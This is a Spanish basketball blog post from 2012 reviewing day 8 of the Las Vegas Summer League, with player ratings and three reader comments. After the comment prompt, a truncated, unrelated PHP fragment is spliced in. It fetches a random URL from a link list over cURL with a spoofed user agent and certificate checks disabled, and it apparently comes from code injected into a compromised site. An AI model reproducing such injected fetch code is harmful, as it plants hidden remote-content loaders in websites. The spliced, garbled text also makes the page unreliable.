Las Vegas Summerleague: Día 8

17 de July de 2012 por txusma

Destacados

Dominique Jones: El escolta de los Mavs es el mejor de su equipo y lo demuestra a cada partido mandando sobre el parquet. 21 puntos, 3 rebotes, 4 asistencias y sólo 1 pérdida.

Jimmer Fredette: Anotar, eso sí que lo hace bien. Con confianza, el jugador de los Kings se puede convertir en una máquina, como sucedió anoche. Se fue a los 30 puntos ayudado también por el hecho de que delante suyo no tenía un perro de presa precisamente.

Houston Rockets: No podemos destacar a los jugadores de uno en uno porque nos están dejando una gran impresión como equipo. Jeremy Lamb anotó 19 puntos, Royce White dejó muestras de su infinita clase con números cercanos al triple-doble (11-10-7), Donatas Motiejunas volvió a ser el del primer partido (19-6), Terrence Jones parece un reloj (17-8) y Marcus Morris parece contagiarse de tanto talento (11-8). Hoy hasta hemos de destacar a Scott Machado que repartió 10 asistencias y anotó 11 puntos. Un gustazo verlos jugar.

Tyler Zeller: Factor diferencial en los 2 partidos que lleva jugados. 19 puntos, 7 rebotes, 2 robos y 2 tapones.

A seguir

Jared Sullinger: En ataque continúa destacando a pesar de su falta de capacidad atlética. Es en defensa donde puede sufrir ante hombres más altos y fuertes. Anoche nos dejó 14 puntos y 7 rebotes.

Feb Melo: Parece que poco a poco va mejorando y va mostrando que, con tiempo, puede ser importante en el aspecto defensivo. Dejó 7 puntos y 5 rebotes (2 ofensivos).

Jae Crowder: Es conocido por su fiereza a la hora de rebotear pero ayer demostró que también es capaz de anotar desde fuera. Sus 15 puntos (con 2 de 4 en triples), 4 rebotes y 2 asistencias nos dan una pincelada de sus características.

Thomas Robinson: No jugó su mejor partido. 10 puntos y 8 rebotes pero un 5 de 13 en tiros de campo, 5 pérdidas y 7 faltas personales.

Derrick Williams: No estuvo bien en el tiro (4 de 12 en TC y 6 de 12 en TL) pero sí en el resto de aspectos: 15 puntos, 9 rebotes, 3 robos, 1 tapón.

Eric Bledsoe: Completísimo primer partido del base de los Clippers con 11 puntos, 5 rebotes, 4 asistencias y 5 robos. Está ante una temporada clave para su futuro.

Doron Lamb & Tobias Harris: Los ponemos juntos porque hicieron una actuación prácticamente calcada. 20 puntos para el primero y 19 para el segundo pero no aportaron en prácticamente ninguna faceta más del juego.

Austin Rivers: Jugó de base y no lo hizo mal del todo. 6 puntos y 5 asistencias a pesar de un conato de lesión en el codo.

Decepciones

John Jenkins: Sabíamos que el jugador de los Hawks es poco más que un anotador pero incluso ha de mejorar bastante en esta faceta. 12 puntos con un 5 de 14 en tiro y 4 pérdidas.

Terrence Ross: Nos esperábamos mucho más de un jugador escogido en el número 8 de este draft tan potente. El escolta de los Raptors nos deja algunos puntos (anoche 11) pero poca incidencia positiva sobre la cancha.

Dion Waiters: Es un animal penetrando pero con eso solo no va a conseguir hacerse un hueco en la liga. Ha de mejorar mucho el tiro de media y larga distancia. Ayer anotó 11 puntos pero con un 4 de 14.

Comenta

3 comentarios a esta entrada

  1. melo15 dice:
    #1

    Vaya generacion de Rookies! Esque te pones a debatir sobre quien sera el rookie del año y no se te acaban los aspirantes!

      Citar

  2. Esteban dice:
    #2

    Me parece q esta vez los especialistas acertaron

    Segun los mock, tanto ross como waiters estaban fuera del top 10 y creo q estan algo por debajo de algunos de sus compañeros de los primeros puestos,

    Y los especialistas daban a sullinger en el puesto 10, y me parece q por calidad merecia ese puesto

    Cada vez veo a howard mas cerca de los rockets, si estos estan dispuestos a intercambiar equipo entero con el magic… Q bueno es LAMB!!

      Citar

  3. Esteban dice:
    #3

    Ah, comparto con el resumen, enorme lo de zeller

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>